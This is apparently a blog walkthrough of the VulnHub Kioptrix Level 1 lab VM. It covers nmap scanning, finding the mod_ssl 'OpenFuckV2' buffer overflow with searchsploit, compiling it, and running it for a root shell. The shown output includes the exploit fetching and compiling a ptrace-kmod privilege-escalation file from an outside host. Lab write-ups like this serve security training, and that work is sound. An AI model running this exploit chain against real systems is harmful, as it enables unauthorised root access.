Posts VulnHub - Kioptrix: Level 1 Writeup
Post
Cancel

VulnHub - Kioptrix: Level 1 Writeup

Download and Setup

The first steps with any Vulnhub box is to download the VM image and setup on our Hypvervisor.

The Image can be downloaded from the Vulnhub site here.

For my setup I’ll be using VMWare Workstation Pro 15.5.6.

Fixing the network

When setting up this VM I encountered an issue where my Kali VM was unable to find the Kioptrix VM. I discovered that this could be quickly solved by opening the .vmx file and changing any setting set to bridged to nat.

You may not have this issue with your setup but this seemed to solve my isuses on VMWare!

Scanning the Host

Now that we have our VM setup and network working we can begin our enumeration. We first need to find the IP of our victim VM.

Finding the IP

First we need to find our Kali IP address with ifconfig. For this setup the IP address of the kali attack machine is 192.168.198.128 with a subnet of 255.255.255.0. We can now find IP address of our VM with the command below which will scan the whole IP range for active hosts.

1
sudo nmap -sn 192.168.198.0/24

nmap scan

Now we know that our host is 192.168.198.133 we can begin our process of finding vulnerable services with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
kali@kali:~$ nmap -sC -sV -T4 192.168.198.133
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 08:28 EDT

Nmap scan report for 192.168.198.133
Host is up (0.0075s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-06-16T12:31:37+00:00; +1m51s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
1024/tcp open  status      1 (RPC #100024)

Nmap done: 1 IP address (1 host up) scanned in 125.78 seconds

HTTP

From out nmap scan we find an HTTP server. Upon browsing this we find an Apache start page. Running gobuster on this port doesn’t reveal any content of use.

searchsploit

Running searchsploit to find any vulnerable versions of services we uncover that the version of mod_ssl has a vulnerability (CVE-2002-0082) with a buffer overflow exploit named OpenFuckV2.

1
2
3
4
5
6
7
8
9
10
11
kali@kali:~$ searchsploit mod_ssl
------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                        |  Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                       | linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                            | multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                  | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                            | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                            | unix/remote/47080.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow          | unix/remote/40347.txt
------------------------------------------------------------------------------------------------------ ---------------------------------

Exploiting OpenSSL

Copying the exploit

We can easily copy the exploit to our current working directory with searchsploit -m 47080.

Installing dependencies

Before we can compile our exploit we need to download some required packages otherwise the build will fail. This can be done with the package manager in kali with the command sudo apt-get install libssl-dev.

Build the exploit

With our dependencies downloaded, navigate to the folder containing our exploit file and use gcc to compile with the command gcc -o OpenFuck 47080.c -lcrypto.

Running the exploit

If we try to run our exploit with ./OpenFuck we find that we need to pass some parameters for the exploit to work in the format ./OpenFuck target box [port] [-c N]

Finding our target

The first parameter is the target OS. From our scan we know we have a RedHat Linux OS running Apache-1.3.20-16. Using this information we find two options suitable for the exploit.

1
2
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

Constructing our command

Now we know our target we can create our command.

  • Target - 0x6b
  • Box - 192.168.198.133
  • Port - 443
  • -c N - -c 40

Running our constructed command will perform the buffer overflow exploit and give us a root shell.

Getting root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
kali@kali:~/Kioptrix$ ./OpenFuck 0x6b 192.168.198.133 443 -c 40

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--09:21:52--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   1.87 MB/s

09:21:52 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]

/usr/bin/ld: cannot open output file exploit: Permission denied
collect2: ld returned 1 exit status
gcc: file path prefix `/usr/bin' never used

whoami
root
This post is licensed under CC BY 4.0 by the author.